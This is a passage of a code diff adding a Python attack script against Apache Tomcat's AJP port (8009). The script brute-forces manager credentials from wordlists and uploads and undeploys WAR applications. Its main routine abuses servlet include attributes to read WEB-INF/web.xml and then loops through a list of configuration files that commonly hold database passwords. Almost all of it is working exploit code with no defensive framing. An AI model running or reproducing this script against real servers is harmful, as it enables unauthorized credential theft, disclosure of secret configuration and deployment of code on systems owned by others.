prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): + fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) + fr.method = method + fr.protocol = "HTTP/1.1" + fr.req_uri = req_uri + fr.remote_addr = target_host + fr.remote_host = None + fr.server_name = target_host + fr.server_port = 80 + fr.request_headers = { + 'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'SC_REQ_CONNECTION': 'keep-alive', + 'SC_REQ_CONTENT_LENGTH': '0', + 'SC_REQ_HOST': target_host, + 'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', + 'Accept-Encoding': 'gzip, deflate, sdch', + 'Accept-Language': 'en-US,en;q=0.5', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' + } + fr.is_ssl = False + + fr.attributes = [] + + return fr + + +class Tomcat(object): + def __init__(self, target_host, target_port): + self.target_host = target_host + self.target_port = target_port + + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.socket.connect((target_host, target_port)) + self.stream = self.socket.makefile("rb", bufsize=0) + + def test_password(self, user, password): + res = False + stop = False + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode( + 'base64').replace('\n', '') + while not stop: + logger.debug("testing %s:%s" % (user, password)) + responses = self.forward_request.send_and_receive(self.socket, self.stream) + snd_hdrs_res = responses[0] + if snd_hdrs_res.http_status_code == 404: + raise NotFoundException("The req_uri %s does not exist!" % self.req_uri) + elif snd_hdrs_res.http_status_code == 302: + self.req_uri = snd_hdrs_res.response_headers.get('Location', '') + logger.info("Redirecting to %s" % self.req_uri) + self.forward_request.req_uri = self.req_uri + elif snd_hdrs_res.http_status_code == 200: + logger.info("Found valid credz: %s:%s" % (user, password)) + res = True + stop = True + if 'Set-Cookie' in snd_hdrs_res.response_headers: + logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', ''))) + elif snd_hdrs_res.http_status_code == 403: + logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % ( + user, password)) + stop = True + elif snd_hdrs_res.http_status_code == 401: + stop = True + + return res + + def start_bruteforce(self, users, passwords, req_uri, autostop): + logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri) + + f_users = open(users, "r") + f_passwords = open(passwords, "r") + + valid_credz = [] + try: + for user in f_users: + f_passwords.seek(0, 0) + for password in f_passwords: + if autostop and len(valid_credz) > 0: + self.socket.close() + return valid_credz + + user = user.rstrip('\n') + password = password.rstrip('\n') + if self.test_password(user, password): + valid_credz.append((user, password)) + except NotFoundException as e: + logger.fatal(e.message) + finally: + logger.debug("Closing socket...") + self.socket.close() + return valid_credz + + def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, + method=AjpForwardRequest.REQUEST_METHODS.get(method)) + logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + if user is not None and password is not None: + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( + "%s:%s" % (user, password)).encode('base64').replace('\n', '') + + for h in headers: + self.forward_request.request_headers[h] = headers[h] + + for a in attributes: + self.forward_request.attributes.append(a) + + responses = self.forward_request.send_and_receive(self.socket, self.stream) + print(responses) + if len(responses) == 0: + return None, None + + snd_hdrs_res = responses[0] + + data_res = responses[1:-1] + if len(data_res) == 0: + logger.info("No data in response. Headers:\n %s" % pformat(vars(snd_hdrs_res))) + + return snd_hdrs_res, data_res + + def upload(self, filename, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + with open(filename, "rb") as f_input: + with open("/tmp/request", "w+b") as f: + s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename( + filename) + s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n' + f.write(s_form_header) + f.write(f_input.read()) + f.write(s_form_footer) + + data_len = os.path.getsize("/tmp/request") + + headers = { + "SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti", + "SC_REQ_CONTENT_LENGTH": "%d" % data_len, + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}] + if old_version == False: + attributes.append({"name": "query_string", "value": deploy_csrf_token}) + old_apps = self.list_installed_applications(user, password, old_version) + r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password, + attributes=attributes) + + with open("/tmp/request", "rb") as f: + br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER) + br.send_and_receive(self.socket, self.stream) + + r = AjpResponse.receive(self.stream) + if r.prefix_code == AjpResponse.END_RESPONSE: + logger.error('Upload failed') + + while r.prefix_code != AjpResponse.END_RESPONSE: + r = AjpResponse.receive(self.stream) + logger.debug('Upload seems normal. Checking...') + new_apps = self.list_installed_applications(user, password, old_version) + if len(new_apps) == len(old_apps) + 1 and new_apps[:-1] == old_apps: + logger.info('Upload success!') + else: + logger.error('Upload failed') + + def get_error_page(self): + return self.perform_request("/blablablablabla") + + def get_version(self): + hdrs, data = self.get_error_page() + for d in data: + s = re.findall('(Apache Tomcat/[0-9\.]+) ', d.data) + if len(s) > 0: + return s[0] + + def get_csrf_token(self, user, password, old_version, headers={}, query=[]): + # first we request the manager page to get the CSRF token + hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password) + deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"', + "".join([d.data for d in rdata])) + if old_version == False: + if len(deploy_csrf_token) == 0: + logger.critical("Failed to get CSRF token. Check the credentials") + return + + logger.debug('CSRF token = %s' % deploy_csrf_token[0]) + obj = re.match("(?PJSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly", + hdrs.response_headers.get('Set-Cookie', '')) + if obj is not None: + return deploy_csrf_token[0], obj + return deploy_csrf_token[0], None + + def list_installed_applications(self, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + headers = { + "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", + "SC_REQ_CONTENT_LENGTH": "0", + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": "req_attribute", + "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] + if old_version == False: + attributes.append({ + "name": "query_string", "value": "%s" % deploy_csrf_token}) + hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password, + attributes=attributes) + found = [] + for d in data: + im = re.findall('/manager/html/expire\?path=([^&]*)&', d.data) + for app in im: + found.append(unquote(app)) + return found + + def undeploy(self, path, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + path_app = "path=%s" % path + headers = { + "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", + "SC_REQ_CONTENT_LENGTH": "0", + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": "req_attribute", + "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] + if old_version == False: + attributes.append({ + "name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)}) + r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password, + attributes=attributes) + r = AjpResponse.receive(self.stream) + if r.prefix_code == AjpResponse.END_RESPONSE: + logger.error('Undeploy failed') + + # Check the successful message + found = False + regex = r'Message:<\/strong><\/small> <\/td>\s*
(OK - .*' + path + ')\s*<\/pre><\/td>'
+        while r.prefix_code != AjpResponse.END_RESPONSE:
+            r = AjpResponse.receive(self.stream)
+            if r.prefix_code == 3:
+                f = re.findall(regex, r.data)
+                if len(f) > 0:
+                    found = True
+        if found:
+            logger.info('Undeploy succeed')
+        else:
+            logger.error('Undeploy failed')
+
+
+if __name__ == "__main__":
+
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('target', type=str, help="Hostname or IP to attack")
+    parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
+    parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
+    args = parser.parse_args()
+    bf = Tomcat(args.target, args.port)
+    attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+    snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+    print("".join([d.data for d in data_res]))
+
+    if "WEB-INF" in "".join([d.data for d in data_res]) or "properties" in "".join([d.data for d in data_res]):
+	    print("**********************注意可能有WEB-INF、properties配置文件*************************")
+
+    if "classpath" in "".join([d.data for d in data_res]) :
+	    print("**********************注意可能有classpath的xml文件*************************")
+
+    words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties',
+'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',
+'WEB-INF/classes/spring-websocket-v2.0.xml','WEB-INF/classes/spring-mvc.xml','WEB-INF/classes/log4j.properties']
+
+    for word in words_list:
+
+        print(":::::::::" + word + ":::::::::")
+        attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', word]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+        snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+        if "Error report" in "".join([d.data for d in data_res]):
+		    pass
+        else:
+            print("".join([d.data for d in data_res]))
+
+